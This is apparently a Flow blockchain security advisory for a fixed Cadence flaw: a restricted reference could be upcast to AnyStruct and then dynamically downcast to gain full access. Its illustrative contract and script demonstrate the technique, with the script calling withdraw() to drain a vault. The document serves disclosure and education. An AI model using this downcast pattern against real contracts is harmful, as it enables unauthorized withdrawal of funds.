Issue Overview
- Current Status: Issue Fixed
- Affected Network: Testnet, Mainnet
Summary of Impact
A critical-impact vulnerability allowed circumventing reference semantics. This could have allowed someone to gain unauthorized access to more functionality than granted.
Technical Summary of Issue
Cadence has special type checking rules for references; for example, an unauthorized reference may not be statically downcast. However, because references are value types, a reference could be upcast to AnyStruct and then dynamically downcast back to the reference as it was originally created, because dynamic downcasting only considers the concrete type of the value.
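The following Cadence snippet is added here as an illustration of the pattern just described; it is not the reporter's proof of concept and not Flow's or the Cadence team's own code. A contract hands out a restricted, unauthorized reference whose runtime type is the unrestricted one, and a script erases the static type through AnyStruct. The contract name `Vault`, the resource, interface and function names, the address `0x01` and the pre-Stable Cadence syntax are all assumptions; the contract and the script would live in separate files.

```cadence
// Contract (pre-Stable Cadence syntax: pub, restricted types &T{I}). Constructed example.
pub contract Vault {

    pub resource interface Viewer {
        pub fun balance(): UFix64
    }

    pub resource Account: Viewer {
        pub var funds: UFix64
        init() { self.funds = 100.0 }
        pub fun balance(): UFix64 { return self.funds }
        // meant to be reachable only through an unrestricted &Account
        pub fun withdraw(amount: UFix64) { self.funds = self.funds - amount }
    }

    access(self) let account: @Account

    // Callers are granted only the Viewer view (static type &Account{Viewer}),
    // but the reference is created unrestricted, so its runtime type is &Account.
    // Creating it as `&self.account as &Account{Viewer}` keeps the runtime
    // type as narrow as the granted one, which is the safer habit regardless.
    pub fun viewer(): &Account{Viewer} {
        return &self.account as &Account
    }

    init() { self.account <- create Account() }
}

// Script run against the deployed contract (assumed address 0x01).
import Vault from 0x01

pub fun main(): Bool {
    let view = Vault.viewer()          // static type &Account{Viewer}

    // Reference semantics enforced statically: an unauthorized restricted
    // reference cannot be downcast, so this line does not type-check.
    // let full = view as? &Account

    // References are values, so the upcast to AnyStruct is always allowed.
    let erased = view as AnyStruct

    // Before the fix the dynamic cast considered only the value's concrete
    // type, &Account, so it succeeded and exposed withdraw().
    if let full = erased as? &Account {
        full.withdraw(amount: 100.0)
        return true                    // downcast succeeded (pre-fix behaviour)
    }
    return false                       // downcast rejected (expected with the fix)
}
```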
Mitigation
The security report was immediately acknowledged and reproduced. A fix was developed and deployed to all networks.
In the long term, the Cadence team is working on a FLIP for entitlements and safe reference downcasting, planned for inclusion in the upcoming Stable Cadence milestone. It proposes to improve the semantics of references by separating the concerns of subtyping and access control through the concept of entitlements. Entitlements will eliminate this class of issue entirely.
Recognition
As core contributors to the Flow ecosystem, we take reported issues very seriously and would like to thank @bluesign for reporting this issue responsibly through our Responsible Disclosure Policy.